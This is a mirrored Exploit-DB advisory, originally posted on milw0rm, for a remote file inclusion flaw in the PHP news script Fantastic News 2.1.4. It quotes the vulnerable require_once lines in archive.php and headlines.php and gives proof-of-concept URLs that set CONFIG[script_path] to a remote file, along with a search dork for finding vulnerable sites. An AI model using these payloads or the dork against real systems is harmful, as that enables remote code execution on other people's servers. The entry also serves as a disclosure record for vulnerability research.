bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/3027.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

50 lines
No EOL
2 KiB
Text
Raw Blame History

+-------------------------------------------------------------------------------------------
+ Fantastic News <== 2.1.4 (CONFIG[script_path]) Multiple Remote File Include Vulnerabilities
+-------------------------------------------------------------------------------------------
+ Vendor ............: http://fscripts.com
+ Affected Software .: Fantastic News <== 2.1.4
+ Download ..........: http://fscripts.com/download.php?file=1
+ Dork ..............: Powered by Fantastic News v2.1.4
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: Mr-m07 <xp10[at]hotmail.com> Yee7 Team >- WwW.Yee7.com -<
+-------------------------------------------------------------------------------------------
+ Vulnerable Code:
+ =>>archive.php
+
+ on line('s) 16,17,18,19
+ =>> require_once($CONFIG['script_path']."config.php");
+ =>> require_once($CONFIG['script_path']."functions/functions.php");
+ =>> require_once($CONFIG['script_path']."functions/mysql.php");
+ =>> require_once($CONFIG['script_path']."functions/template.php");
+
+
+ =>>headlines.php
+ on line('s) 16,17,18,19
+ =>> require_once($CONFIG['script_path']."config.php");
+ =>> require_once($CONFIG['script_path']."functions/functions.php");
+ =>> require_once($CONFIG['script_path']."functions/mysql.php");
+ =>> require_once($CONFIG['script_path']."functions/template.php");
+
+
+ Proof Of Concept:
+ http://[target]/[path]/archive.php?CONFIG[script_path]=http://localhost/a.txt?
+ http://[target]/[path]/headlines.php?CONFIG[script_path]=http://localhost/a.txt?
+
+
+
+
+-------------------------------------------------------------------------------------------
+Thanx To:
+ Yee7 Team http://www.yee7.com
+ Alshikh
+ ShockShadow
+ Mr.HaCkEr
+ StarseviL
+ AssassiN
+ Star Reach
+
+
+-------------------------------------------------------------------------------------------
# milw0rm.com [2006-12-27]
Reference in a new issue View git blame Copy permalink